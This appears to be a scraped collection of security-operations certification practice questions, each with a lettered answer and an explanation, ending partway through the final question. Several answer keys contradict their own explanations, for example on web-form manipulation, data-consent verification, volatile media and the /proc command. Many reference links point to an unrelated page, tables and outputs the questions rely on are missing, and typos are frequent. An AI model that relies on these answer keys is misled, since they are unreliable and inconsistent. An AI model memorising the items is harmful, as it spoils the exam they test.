Which of the following would help to minimize human engagement and aid in process improvement in security operations?
- A . OSSTMM
- B . SIEM
- C . SOAR
- D . QVVASP
C
Explanation:
SOAR stands for security orchestration, automation, and response, which is a term that describes a set of tools, technologies, or platforms that can help streamline, standardize, and automate security operations and incident response processes and tasks. SOAR can help minimize human engagement and aid in process improvement in security operations by reducing manual work, human errors, response time, or complexity. SOAR can also help enhance collaboration, coordination, efficiency, or effectiveness of security operations and incident response teams.
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request.
Which of the following risk management principles did the CISO select?
- A . Avoid
- B . Transfer
- C . Accept
- D . Mitigate
A
Explanation:
Avoid is a risk management principle that describes the decision or action of not engaging in an activity or accepting a risk that is deemed too high or unacceptable. Avoiding a risk can eliminate the possibility or impact of the risk, as well as the need for any further risk management actions. In this case, the CISO decided the risk score would be too high and refused the software request. This indicates that the CISO selected the avoid principle for risk management.
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
- A . Identify any improvements or changes in the incident response plan or procedures
- B . Determine if an internal mistake was made and who did it so they do not repeat the error
- C . Present all legal evidence collected and turn it over to iaw enforcement
- D . Discuss the financial impact of the incident to determine if security controls are well spent
A
Explanation:
An important aspect that should be included in the lessons-learned step after an incident is to identify any improvements or changes in the incident response plan or procedures. The lessons-learned step is a process that involves reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying any improvements or changes in the incident response plan or procedures can help enhance the security posture, readiness, or capability of the organization for future incidents
The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals.
Which of the following will best achieve the goal and maximize results?
- A . Single pane of glass
- B . Single sign-on
- C . Data enrichment
- D . Deduplication
D
Explanation:
Deduplication is a process that involves removing any duplicate or redundant data or information from a data set or source. Deduplication can help consolidate several threat intelligence feeds by eliminating any overlapping or repeated indicators of compromise (IoCs), alerts, reports, or recommendations. Deduplication can also help reduce the volume and complexity of threat intelligence data, as well as improve its quality, accuracy, or relevance.
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
- A . MITRE ATTACK
- B . Cyber Kill Cham
- C . OWASP
- D . STIXTAXII
A
Explanation:
MITRE ATT&CK is a framework and knowledge base that describes the tactics, techniques, and procedures (TTPs) used by various adversaries in cyberattacks. MITRE ATT&CK can help security analysts compare TTPs between different known adversaries of an organization, as well as identify patterns, gaps, or trends in adversary behavior. MITRE ATT&CK can also help security analysts improve threat detection, analysis, and response capabilities, as well as share threat intelligence with other organizations or communities
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system.
Which of the following steps of the process does this describe?
- A . Eradication
- B . Recovery
- C . Containment
- D . Preparation
A
Explanation:
Eradication is a step in the incident response process that involves removing any traces or remnants of the incident from the affected systems or networks, such as malware, backdoors, compromised accounts, or malicious files. Eradication also involves restoring the systems or networks to their normal or secure state, as well as verifying that the incident is completely eliminated and cannot recur. In this case, the analyst is remediating items associated with a recent incident by isolating the vulnerability and actively removing it from the system. This describes the eradication step of the incident response process.
Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet.
Which of the following would be the best action for the incident response team to recommend?
- A . Isolate Joe’s PC from the network
- B . Reimage the PC based on standard operating procedures
- C . Initiate a remote wipe of Joe’s PC using mobile device management
- D . Perform no action until HR or legal counsel advises on next steps
D
Explanation:
The best action for the incident response team to recommend in this scenario is to perform no action until HR or legal counsel advises on next steps. This action can help avoid any potential legal or ethical issues, such as violating employee privacy rights, contractual obligations, or organizational policies. This action can also help ensure that any evidence or information collected from the employee’s system or network is admissible and valid in case of any legal action or dispute. The incident response team should consult with HR or legal counsel before taking any action that may affect the employee’s system or network.
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program.
Which of the following is the best priority based on common attack frameworks?
- A . Reduce the administrator and privileged access accounts
- B . Employ a network-based IDS
- C . Conduct thorough incident response
- D . Enable SSO to enterprise applications
A
Explanation:
The best priority based on common attack frameworks for a new program to reduce attack surface risks and threats as part of a zero trust approach is to reduce the administrator and privileged access accounts. Administrator and privileged access accounts are accounts that have elevated permissions or capabilities to perform sensitive or critical tasks on systems or networks, such as installing software, changing configurations, accessing data, or granting access. Reducing the administrator and privileged access accounts can help minimize the attack surface, as it can limit the number of potential targets or entry points for attackers, as well as reduce the impact or damage of an attack if an account is compromised.
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened.
Which of the following actions should the analyst take first?
- A . Clone the virtual server for forensic analysis
- B . Log in to the affected server and begin analysis of the logs
- C . Restore from the last known-good backup to confirm there was no loss of connectivity
- D . Shut down the affected server immediately
A
Explanation:
The first action that the analyst should take in this case is to clone the virtual server for forensic analysis. Cloning the virtual server involves creating an exact copy or image of the server’s data and state at a specific point in time. Cloning the virtual server can help preserve and protect any evidence or information related to the security incident, as well as prevent any tampering, contamination, or destruction of evidence. Cloning the virtual server can also allow the analyst to safely analyze and investigate the incident without affecting the original server or its operations.
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well.
Which of the following is the most likely explanation?
- A . C2 beaconing activity
- B . Data exfiltration
- C . Anomalous activity on unexpected ports
- D . Network host IP address scanning
- E . A rogue network device
A
Explanation:
The most likely explanation for this traffic pattern is C2 beaconing activity. C2 stands for command and control, which is a phase of the Cyber Kill Chain that involves the adversary attempting to establish communication with a successfully exploited target. C2 beaconing activity is a type of network traffic that indicates a compromised system is sending periodic messages or signals to an attacker’s system using various protocols, such as HTTP(S), DNS, ICMP, or UDP. C2 beaconing activity can enable the attacker to remotely control or manipulate the target system or network using various methods, such as malware callbacks, backdoors, botnets, or covert channels.
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy.
Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
- A . Human resources must email a copy of a user agreement to all new employees
- B . Supervisors must get verbal confirmation from new employees indicating they have read the user agreement
- C . All new employees must take a test about the company security policy during the cjitoardmg process
- D . All new employees must sign a user agreement to acknowledge the company security policy
D
Explanation:
The best action that the SOC manager can recommend to help ensure new employees are accountable for following the company policy is to require all new employees to sign a user agreement to acknowledge the company security policy. A user agreement is a document that defines the rights and responsibilities of the users regarding the use of the company’s systems, networks, or resources, as well as the consequences of violating the company’s security policy. Signing a user agreement can help ensure new employees are aware of and agree to comply with the company security policy, as well as hold them accountable for any breaches or incidents caused by their actions or inactions.
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft.
Which of the following would be the best threat intelligence source to learn about this new campaign?
- A . Information sharing organization
- B . Blogs/forums
- C . Cybersecurity incident response team
- D . Deep/dark web
A
Explanation:
An information sharing organization is a group or network of organizations that share threat intelligence, best practices, or lessons learned related to cybersecurity issues or incidents. An information sharing organization can help security analysts learn about new ransomware campaigns or other emerging threats, as well as get recommendations or guidance on how to prevent, detect, or respond to them. An information sharing organization can also help security analysts collaborate or coordinate with other organizations in the same industry or region that may face similar threats or challenges.
An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned.
Which of the following is the most likely reason to include lessons learned?
- A . To satisfy regulatory requirements for incident reporting
- B . To hold other departments accountable
- C . To identify areas of improvement in the incident response process
- D . To highlight the notable practices of the organization’s incident response team
C
Explanation:
The most likely reason to include lessons learned in an after-action report is to identify areas of improvement in the incident response process. The lessons learned process is a way of reviewing and evaluating the incident response activities and outcomes, as well as identifying and documenting any strengths, weaknesses, gaps, or best practices. Identifying areas of improvement in the incident response process can help enhance the security posture, readiness, or capability of the organization for future incidents, as well as provide feedback or recommendations on how to address any issues or challenges.
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans.
Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:
Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority.
Which of the following vulnerabilities should be patched first, given the above third-party scoring system?
- A . InLoud:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: Yes
Channing: No - B . TSpirit:
Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No - C . ENameless:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: No
Channing: No - D . PBleach:
Cobain: Yes
Grohl: No
Novo: No
Smear: No
Channing: Yes
B
Explanation:
The vulnerability that should be patched first, given the above third-party scoring system, is:
TSpirit: Cobain: Yes Grohl: Yes Novo: Yes Smear: No Channing: No
This vulnerability has three out of five metrics marked as Yes, which indicates a high severity level. The metrics Cobain, Grohl, and Novo are more important than Smear and Channing, according to the vulnerability management team. Therefore, this vulnerability poses a greater risk than the other vulnerabilities and should be patched first.
A user downloads software that contains malware onto a computer that eventually infects numerous other systems.
Which of the following has the user become?
- A . Hacklivist
- B . Advanced persistent threat
- C . Insider threat
- D . Script kiddie
C
Explanation:
The user has become an insider threat by downloading software that contains malware onto a computer that eventually infects numerous other systems. An insider threat is a person or entity that has legitimate access to an organization’s systems, networks, or resources and uses that access to cause harm or damage to the organization. An insider threat can be intentional or unintentional, malicious or negligent, and can result from various actions or behaviors, such as downloading unauthorized software, violating security policies, stealing data, sabotaging systems, or collaborating with external attackers.
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network.
Which of the following should the CSIRT conduct next?
- A . Take a snapshot of the compromised server and verify its integrity
- B . Restore the affected server to remove any malware
- C . Contact the appropriate government agency to investigate
- D . Research the malware strain to perform attribution
A
Explanation:
The next action that the CSIRT should conduct after isolating the compromised server from the network is to take a snapshot of the compromised server and verify its integrity. Taking a snapshot of the compromised server involves creating an exact copy or image of the server’s data and state at a specific point in time. Verifying its integrity involves ensuring that the snapshot has not been altered, corrupted, or tampered with during or after its creation. Taking a snapshot and verifying its integrity can help preserve and protect any evidence or information related to the incident, as well as prevent any tampering, contamination, or destruction of evidence.
During an incident, an analyst needs to acquire evidence for later investigation.
Which of the following must be collected first in a computer system, related to its volatility level?
- A . Disk contents
- B . Backup data
- C . Temporary files
- D . Running processes
D
Explanation:
The most volatile type of evidence that must be collected first in a computer system is running processes. Running processes are programs or applications that are currently executing on a computer system and using its resources, such as memory, CPU, disk space, or network bandwidth. Running processes are very volatile because they can change rapidly or disappear completely when
the system is shut down, rebooted, logged off, or crashed. Running processes can also be affected by other processes or users that may modify or terminate them. Therefore, running processes must be collected first before any other type of evidence in a computer system
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.
Which of the following shell script functions could help achieve the goal?
- A . function w() { a=$(ping -c 1 $1 | awk-F ”/” ’END{print $1}’) && echo “$1 | $a” }
- B . function x() { b=traceroute -m 40 $1 | awk ’END{print $1}’) && echo “$1 | $b” }
- C . function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }
- D . function z() { c=$(geoiplookup$1) && echo “$1 | $c” }
C
Explanation:
The shell script function that could help identify possible network addresses from different source networks belonging to the same company and region is:
function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ”.in-addr” ’{print $1}’).origin.asn.cymru.com TXT +short }
This function takes an IP address as an argument and performs two DNS lookups using the dig command. The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system number (ASN) and other information related to the IP address, such as the country code, registry, or allocation date. The function then prints the IP address and the ASN information, which can help identify any network addresses that belong to the same ASN or region
A security analyst is writing a shell script to identify IP addresses from the same country.
Which of the following functions would help the analyst achieve the objective?
- A . function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }
- B . function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
- C . function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }
- D . function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }
B
Explanation:
The function that would help the analyst identify IP addresses from the same country is:
function x() { info=$(geoiplookup $1) && echo “$1 | $info” }
This function takes an IP address as an argument and uses the geoiplookup command to get the geographic location information associated with the IP address, such as the country name, country code, region, city, or latitude and longitude. The function then prints the IP address and the geographic location information, which can help identify any IP addresses that belong to the same country.
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:
Which of the following should be completed first to remediate the findings?
- A . Ask the web development team to update the page contents
- B . Add the IP address allow listing for control panel access
- C . Purchase an appropriate certificate from a trusted root CA
- D . Perform proper sanitization on all fields
D
Explanation:
The first action that should be completed to remediate the findings is to perform proper sanitization on all fields. Sanitization is a process that involves validating, filtering, or encoding any user input or data before processing or storing it on a system or application. Sanitization can help prevent various types of attacks, such as cross-site scripting (XSS), SQL injection, or command injection, that exploit unsanitized input or data to execute malicious scripts, commands, or queries on a system or application. Performing proper sanitization on all fields can help address the most critical and common vulnerability found during the vulnerability assessment, which is XSS.
A user reports a malware alert to the help desk. A technician verities the alert, determines the workstation is classified as a low-severity device, and uses network controls to block access. The technician then assigns the ticket to a security analyst who will complete the eradication and recovery processes.
Which of the following should the security analyst do next?
- A . Document the procedures and walk through the incident training guide.
- B . Reverse engineer the malware to determine its purpose and risk to the organization.
- C . Sanitize the workstation and verify countermeasures are restored.
- D . Isolate the workstation and issue a new computer to the user.
C
Explanation:
Sanitizing the workstation and verifying countermeasures are restored are part of the eradication and recovery processes that the security analyst should perform next. Eradication is the process of removing malware or other threats from the affected systems, while recovery is the process of restoring normal operations and functionality to the affected systems. Sanitizing the workstation can involve deleting or wiping any malicious files or programs, while verifying countermeasures are restored can involve checking and updating any security controls or settings that may have been compromised.
Reference: https://www.cynet.com/incident-response/incident-response-sans-the-6-steps-in-depth/
A digital forensics investigator works from duplicate images to preserve the integrity of the original evidence.
Which of the following types of media are most volatile and should be preserved? (Select two).
- A . Memory cache
- B . Registry file
- C . SSD storage
- D . Temporary filesystems
- E . Packet decoding
- F . Swap volume
AD
Explanation:
Memory cache and swap volume are types of media that are most volatile and should be preserved during a digital forensics investigation. Volatile media are those that store data temporarily and lose their contents when the power is turned off or interrupted. Memory cache is a small and fast memory that stores frequently used data or instructions for faster access by the processor. Swap volume is a part of the hard disk that is used as an extension of the memory when the memory is full or low.
Reference: https://www.techopedia.com/definition/10339/memory-dump
A development team recently released a new version of a public-facing website for testing prior to
production. The development team is soliciting the help of various teams to validate the functionality of the website due to its high visibility.
Which of the following activities best describes the process the development team is initiating?
- A . Static analysis
- B . Stress testing
- C . Code review
- D . User acceptance testing
D
Explanation:
User acceptance testing is a process of verifying that a software application meets the requirements and expectations of the end users before it is released to production. User acceptance testing can help to validate the functionality, usability, performance and compatibility of the software application with real-world scenarios and feedback. User acceptance testing can involve various teams, such as developers, testers, customers and stakeholders.
Reference: https://www.techopedia.com/definition/3887/user-acceptance-testing-uat
A security technician is testing a solution that will prevent outside entities from spoofing the company’s email domain, which is compatia.org. The testing is successful, and the security technician is prepared to fully implement the solution.
Which of the following actions should the technician take to accomplish this task?
- A . Add TXT @ "v=spfl mx include:_spf.comptia. org -all" to the DNS record.
- B . Add : XT @ "v=spfl mx include:_sp£.comptia.org -all" to the email server.
- C . Add TXT @ "v=spfl mx include:_sp£.comptia.org +all" to the domain controller.
- D . AddTXT @ "v=apfl mx lnclude:_spf .comptia.org +a 11" to the web server.
A
Explanation:
Adding TXT @ “v=spfl mx include: _spf.comptia. org -all” to the DNS record can help to prevent outside entities from spoofing the company’s email domain, which is comptia.org. This is an example of a Sender Policy Framework (SPF) record, which is a type of DNS record that specifies which mail servers are authorized to send email on behalf of a domain. SPF records can help to prevent spoofing by allowing the recipient mail servers to check the validity of the sender’s domain against the SPF record. The “-all” at the end of the SPF record indicates that any mail server that is not listed in the SPF record is not authorized to send email for comptia.org.
Reference: https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/
A security analyst who works in the SOC receives a new requirement to monitor for indicators of
compromise.
Which of the following is the first action the analyst should take in this situation?
- A . Develop a dashboard to track the indicators of compromise.
- B . Develop a query to search for the indicators of compromise.
- C . Develop a new signature to alert on the indicators of compromise.
- D . Develop a new signature to block the indicators of compromise.
B
Explanation:
Developing a query to search for the indicators of compromise is the first action the analyst should take in this situation. Indicators of compromise (IOCs) are pieces of information that suggest a system or network has been compromised by an attacker. IOCs can include IP addresses, domain names, file hashes, URLs, or other artifacts that are associated with malicious activity. Developing a query to search for IOCs can help to identify any potential incidents or threats in the environment and initiate further investigation or response.
Explanation:
Reference: https://www.crowdstrike.com/cybersecurity-101/incident-response/indicators-of-compromise/
During an investigation, an analyst discovers the following rule in an executive’s email client:
The executive is not aware of this rule.
Which of the following should the analyst do first to evaluate the potential impact of this security incident?
- A . Check the server logs to evaluate which emails were sent to <someaddress@domain,com>.
- B . Use the SIEM to correlate logging events from the email server and the domain server.
- C . Remove the rule from the email client and change the password.
- D . Recommend that the management team implement SPF and DKIM.
A
Explanation:
Checking the server logs to evaluate which emails were sent to <someaddress@domain,com> is the first action the analyst should do to evaluate the potential impact of this security incident. Server logs are records of events or activities that occur on a server, such as email transactions, web requests, or authentication attempts. Checking the server logs can help to determine how many emails were sent to <someaddress@domain,com>, when they were sent, who sent them, and what they contained. This can help to assess the scope and severity of the incident and plan further actions.
Reference: https://www.techopedia.com/definition/1308/server-log
A security analyst is investigating a compromised Linux server.
The analyst issues the ps command and receives the following output:
Which of the following commands should the administrator run next to further analyze the compromised system?
- A . gbd /proc/1301
- B . rpm -V openssh-server
- C . /bin/Is -1 /proc/1301/exe
- D . kill -9 1301
A
Explanation:
/bin/ls -1 /proc/1301/exe is the command that will show the absolute path to the executed binary file associated with the process ID 1301, which is ./usr/sbin/sshd. This information can help the security analyst determine if the binary is an official version and has not been modified, which could be an indicator of a compromise. /proc/1301/exe is a special symbolic link that points to the executable file that was used to start the process 1301.
Reference: https://unix.stackexchange.com/questions/197854/how-does-the-proc-pid-exe-symlink-differ-from-ordinary-symlinks
The following output is from a tcpdump al the edge of the corporate network:
Which of the following best describes the potential security concern?
- A . Payload lengths may be used to overflow buffers enabling code execution.
- B . Encapsulated traffic may evade security monitoring and defenses
- C . This traffic exhibits a reconnaissance technique to create network footprints.
- D . The content of the traffic payload may permit VLAN hopping.
B
Explanation:
Encapsulated traffic may evade security monitoring and defenses by hiding or obfuscating the actual content or source of the traffic. Encapsulation is a technique that wraps data packets with additional headers or protocols to enable communication across different network types or layers.
Encapsulation can be used for legitimate purposes, such as tunneling, VPNs, or NAT, but it can also be used by attackers to bypass security controls or detection mechanisms that are not able to inspect or analyze the encapsulated traffic.
Reference: https://www.techopedia.com/definition/10339/memory-dump
A company’s threat team has been reviewing recent security incidents and looking for a common theme. The team discovered the incidents were caused by incorrect configurations on the impacted systems. The issues were reported to support teams, but no action was taken.
Which of the following is the next step the company should take to ensure any future issues are remediated?
- A . Require support teams to develop a corrective control that ensures security failures are addressed once they are identified.
- B . Require support teams to develop a preventive control that ensures new systems are built with the required security configurations.
- C . Require support teams to develop a detective control that ensures they continuously assess systems for configuration errors.
- D . Require support teams to develop a managerial control that ensures systems have a documented configuration baseline.
A
Explanation:
Requiring support teams to develop a corrective control that ensures security failures are addressed once they are identified is the best step to prevent future issues from being remediated. Corrective controls are actions or mechanisms that are implemented after a security incident or failure has occurred to fix or restore the normal state of the system or network. Corrective controls can include patching, updating, repairing, restoring, or reconfiguring systems or components that were affected by the incident or failure.
Reference: https://www.techopedia.com/definition/10339/memory-dump
A product manager is working with an analyst to design a new application that will perform as a data analytics platform and will be accessible via a web browser. The product manager suggests using a PaaS provider to host the application.
Which of the following is a security concern when using a PaaS solution?
- A . The use of infrastructure-as-code capabilities leads to an increased attack surface.
- B . Patching the underlying application server becomes the responsibility of the client.
- C . The application is unable to use encryption at the database level.
- D . Insecure application programming interfaces can lead to data compromise.
D
Explanation:
Insecure application programming interfaces (APIs) can lead to data compromise when using a PaaS solution. APIs are interfaces that allow applications to communicate with each other and with the underlying platform. APIs can expose sensitive data or functionality to unauthorized or malicious users if they are not properly designed, implemented, or secured. Insecure APIs can result in data breaches, denial of service, unauthorized access, or code injection.
Reference: https://spot.io/resources/cloud-security/paas-security-threats-solutions-and-best-practices/
A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a report with 2.450 pages.
Which of the following would most likely decrease the number of false positives?
- A . Manual validation
- B . Penetration testing
- C . A known-environment assessment
- D . Credentialed scanning
D
Explanation:
Credentialed scanning is a method of vulnerability scanning that uses valid user credentials to access the target systems and perform a more thorough and accurate assessment of their security posture. Credentialed scanning can help to reduce the number of false positives by allowing the scanner to access more information and resources on the systems, such as configuration files, registry keys, installed software, patches, and permissions.
Reference: https://www.tenable.com/blog/credentialed-vulnerability-scanning-what-why-and-how
An organization wants to move non-essential services into a cloud computing environment. The management team has a cost focus and would like to achieve a recovery time objective of 12 hours.
Which of the following cloud recovery strategies would work best to attain the desired outcome?
- A . Duplicate all services in another instance and load balance between the instances.
- B . Establish a hot site with active replication to another region within the same cloud provider.
- C . Set up a warm disaster recovery site with the same cloud provider in a different region.
- D . Configure the systems with a cold site at another cloud provider that can be used for failover.
C
Explanation:
Setting up a warm disaster recovery site with the same cloud provider in a different region can help to achieve a recovery time objective (RTO) of 12 hours while keeping the costs low. A warm disaster recovery site is a partially configured site that has some of the essential hardware and software components ready to be activated in case of a disaster. A warm site can provide faster recovery than
a cold site, which has no preconfigured components, but lower costs than a hot site, which has fully configured and replicated components. Using the same cloud provider can help to simplify the migration and synchronization processes, while using a different region can help to avoid regional outages or disasters.
Reference: https://www.techopedia.com/definition/10339/memory-dump
A security analyst discovers the company’s website is vulnerable to cross-site scripting.
Which of the following solutions will best remedy the vulnerability?
- A . Prepared statements
- B . Server-side input validation
- C . Client-side input encoding
- D . Disabled JavaScript filtering
B
Explanation:
Server-side input validation is a solution that can prevent cross-site scripting (XSS) vulnerabilities by checking and filtering any user input that is sent to the server before rendering it on a web page. Server-side input validation can help to ensure that the user input conforms to the expected format, length and type, and does not contain any malicious characters or syntax that may alter the logic or behavior of the web page. Server-side input validation can also reject or sanitize any input that does not meet the validation criteria.
Reference: https://portswigger.net/web-security/cross-site-scripting/preventing
An organization supports a large number of remote users.
Which of the following is the best option to protect the data on the remote users’ laptops?
- A . Require the use of VPNs.
- B . Require employees to sign an NDA.
- C . Implement a DLP solution.
- D . Use whole disk encryption.
D
Explanation:
Using whole disk encryption is the best option to protect the data on the remote users’ laptops. Whole disk encryption is a technique that encrypts all data on a hard disk drive, including the operating system, applications and files. Whole disk encryption can prevent unauthorized access to the data if the laptop is lost, stolen or compromised. Whole disk encryption can also protect the data from physical attacks, such as removing the hard disk and connecting it to another device.
Reference: https://www.techopedia.com/definition/10339/memory-dump
A security analyst is monitoring a company’s network traffic and finds ping requests going to accounting and human resources servers from a SQL server. Upon investigation, the analyst discovers a technician responded to potential network connectivity issues.
Which of the following is the best way for the security analyst to respond?
- A . Report this activity as a false positive, as the activity is legitimate.
- B . Isolate the system and begin a forensic investigation to determine what was compromised.
- C . Recommend network segmentation to the management team as a way to secure the various environments.
- D . Implement host-based firewalls on all systems to prevent ping sweeps in the future.
A
Explanation:
Reporting this activity as a false positive, as the activity is legitimate, is the best way for the security analyst to respond. A false positive is a condition in which harmless traffic is classified as a potential network attack by a security monitoring tool. Ping requests are a common network diagnostic tool that can be used to test network connectivity issues. The technician who responded to potential network connectivity issues was performing a legitimate task and did not pose any threat to the accounting and human resources servers.
Reference: https://www.techopedia.com/definition/10339/memory-dump
Which of the following software assessment methods world peak times?
- A . Security regression testing
- B . Stress testing
- C . Static analysis testing
- D . Dynamic analysis testing
- E . User acceptance testing
B
Explanation:
Stress testing is a software assessment method that tests how an application performs under peak times or extreme workloads. Stress testing can help to identify any performance issues, bottlenecks, errors or crashes that may occur when an application faces high demand or concurrent users. Stress testing can also help to determine the maximum capacity and scalability of an application.
Reference: https://www.techopedia.com/definition/10339/memory-dump
During an incident response procedure, a security analyst acquired the needed evidence from the hard drive of a compromised machine.
Which of the following actions should the analyst perform next to ensure the data integrity of the evidence?
- A . Generate hashes for each file from the hard drive.
- B . Create a chain of custody document.
- C . Determine a timeline of events using correct time synchronization.
- D . Keep the cloned hard drive in a safe place.
A
Explanation:
Generating hashes for each file from the hard drive is the next action that the analyst should perform to ensure the data integrity of the evidence. Hashing is a technique that produces a unique and fixed-length value for a given input, such as a file or a message. Hashing can help to verify the data integrity of the evidence by comparing the hash values of the original and copied files. If the hash values match, then the evidence has not been altered or corrupted. If the hash values differ, then the evidence may have been tampered with or damaged.
As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack scenarios derived from the available threat intelligence information. After forming the basis of the scenario, which of the following may the threat hunter construct to establish a framework for threat assessment?
- A . Critical asset list
- B . Threat vector
- C . Attack profile
- D . Hypothesis
D
Explanation:
A hypothesis is a statement that can be tested by threat hunters to establish a framework for threat assessment. A hypothesis is based on situational awareness and threat intelligence information, and describes a possible attack scenario that may affect the organization. A hypothesis can help to guide threat hunters in their investigation by providing a clear and specific question to answer, such as “Is there any evidence of lateral movement within our network?” or “Are there any signs of data exfiltration from our servers?”.
Reference: https://www.crowdstrike.com/blog/tech-center/threat-hunting-hypothesis-development/
A company creates digitally signed packages for its devices.
Which of the following best describes the
method by which the security packages are delivered to the company’s customers?
- A . Antitamper mechanism
- B . SELinux
- C . Trusted firmware updates
- D . eFuse
C
Explanation:
Trusted firmware updates are a method by which security packages are delivered to the company’s customers. Trusted firmware updates are digitally signed packages that contain software updates or patches for devices, such as routers, switches, or firewalls. Trusted firmware updates can help to ensure the authenticity and integrity of the packages by verifying the digital signature of the sender and preventing unauthorized or malicious modifications to the packages.
Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_trustsec/configuration/xe-16/sec-usr-trustsec-xe-16-book/sec-trust-firm-upd.html
During an audit, several customer order forms were found to contain inconsistencies between the actual price of an item and the amount charged to the customer. Further investigation narrowed the cause of the issue to manipulation of the public-facing web form used by customers to order products.
Which of the following would be the best way to locate this issue?
- A . Reduce the session timeout threshold
- B . Deploy MFA for access to the web server.
- C . Implement input validation.
- D . Run a dynamic code analysis.
D
Explanation:
Implementing input validation is the best way to locate and prevent the issue of manipulation of the public-facing web form used by customers to order products. Input validation is a technique that checks and filters any user input that is sent to an application before processing it. Input validation can help to ensure that the user input conforms to the expected format, length and type, and does not contain any malicious characters or syntax that may alter the logic or behavior of the application. Input validation can also reject or sanitize any input that does not meet the validation criteria.
Reference: https://portswigger.net/web-security/input-validation
A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the company. The CISO has tasked a security analyst with finding the proper control functions to verify that a user’s data is not altered without the user’s consent.
Which of the following would be an appropriate course of action?
- A . Automate the use of a hashing algorithm after verified users make changes to their data.
- B . Use encryption first and then hash the data at regular, defined times.
- C . Use a DLP product to monitor the data sets for unauthorized edits and changes.
- D . Replicate the data sets at regular intervals and continuously compare the copies for unauthorized changes.
C
Explanation:
Automating the use of a hashing algorithm after verified users make changes to their data is an appropriate course of action to verify that a user’s data is not altered without the user’s consent. Hashing is a technique that produces a unique and fixed-length value for a given input, such as a file or a message. Hashing can help to verify the data integrity by comparing the hash values of the original and modified data. If the hash values match, then the data has not been altered without the user’s consent. If the hash values differ, then the data may have been tampered with or corrupted.
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is concerned with ensuring all devices are patched and running some sort of protection against malicious software.
Which of the following existing technical controls should a security analyst recommend to best meet all the requirements?
- A . EDR
- B . Port security
- C . NAC
- D . Segmentation
A
Explanation:
EDR stands for endpoint detection and response, which is a type of security solution that monitors and protects all devices that are connected to a network, such as laptops and mobile phones. EDR can help to ensure that all devices are patched and running some sort of protection against malicious software by providing continuous visibility, threat detection, incident response, and remediation capabilities. EDR can also help to enforce security policies and compliance requirements across all devices.
Reference: https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/
A security analyst discovers the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can access it.
Which of the following threats applies to this situation?
- A . Potential data loss to external users
- B . Loss of public/private key management
- C . Cloud-based authentication attack
- D . Identification and authentication failures
A
Explanation:
Potential data loss to external users is a threat that applies to this situation, where the accounting department is hosting an accounts receivable form on a public document service. Anyone with the link can access it. Data loss is an event that results in the destruction, corruption, or unauthorized disclosure of sensitive or confidential data. Data loss can occur due to various reasons, such as human error, hardware failure, malware infection, or cyberattack. In this case, hosting an accounts receivable form on a public document service exposes the data to potential data loss to external users who may access it without authorization or maliciously modify or delete it.
A security analyst is supporting an embedded software team.
Which of the following is the best recommendation to ensure proper error handling at runtime?
- A . Perform static code analysis.
- B . Require application fuzzing.
- C . Enforce input validation.
- D . Perform a code review.
D
Explanation:
Performing a code review is the best recommendation to ensure proper error handling at runtime for an embedded software team. A code review is a process of examining and evaluating source code by one or more developers other than the original author. A code review can help to identify and fix any errors, bugs, vulnerabilities, or inefficiencies in the code before it is deployed or executed. A code review can also help to ensure that the code follows the best practices, standards, and guidelines for error handling at runtime.
The steering committee for information security management annually reviews the security incident register for the organization to look for trends and systematic issues. The steering committee wants to rank the risks based on past incidents to improve the security program for next year.
Below is the incident register for the organization:
Which of the following should the organization consider investing in first due to the potential impact of availability?
- A . Hire a managed service provider to help with vulnerability management.
- B . Build a warm site in case of system outages.
